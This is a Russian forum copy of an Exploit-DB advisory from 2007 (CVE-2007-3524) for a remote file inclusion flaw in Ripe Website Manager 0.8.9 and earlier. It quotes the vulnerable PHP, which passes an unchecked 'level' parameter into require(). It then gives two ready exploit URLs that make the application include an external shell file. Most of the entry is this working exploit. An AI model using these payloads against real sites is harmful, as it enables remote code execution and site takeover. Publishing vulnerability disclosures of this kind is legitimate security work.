- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 4129
- Проверка EDB
-
- Пройдено
- Автор
- BLACKNDOOR
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- cve-2007-3524
- Дата публикации
- 2007-06-30
Код:
#Author:: BlackNDoor | [email protected]
#Homepage:: www.learntohell.net
#
#Script:: Ripe Wepsite Manager
#Version:: <= v0.8.9
#Type:: Remote File Include
#
#Source:: http://sourceforge.net/project/showfiles.php?group_id=194532
#Bug::
-> Files:
/admin/includes/author_panel_header.php
/admin/includes/admin_header.php
-> vulncode:
<?php
...
define("LEVEL", $level); // directory level
// includes
require(LEVEL.'../includes/config.php');
...
?>
#Exploit::
http://www.site.com/[path to ripe]/admin/includes/author_panel_header.php?level=shell.txt?
http://www.site.com/[path to ripe]/admin/includes/admin_header.php?level=shell.txt?
#thanks:: str0ke
# milw0rm.com [2007-06-30]- Источник
- www.exploit-db.com
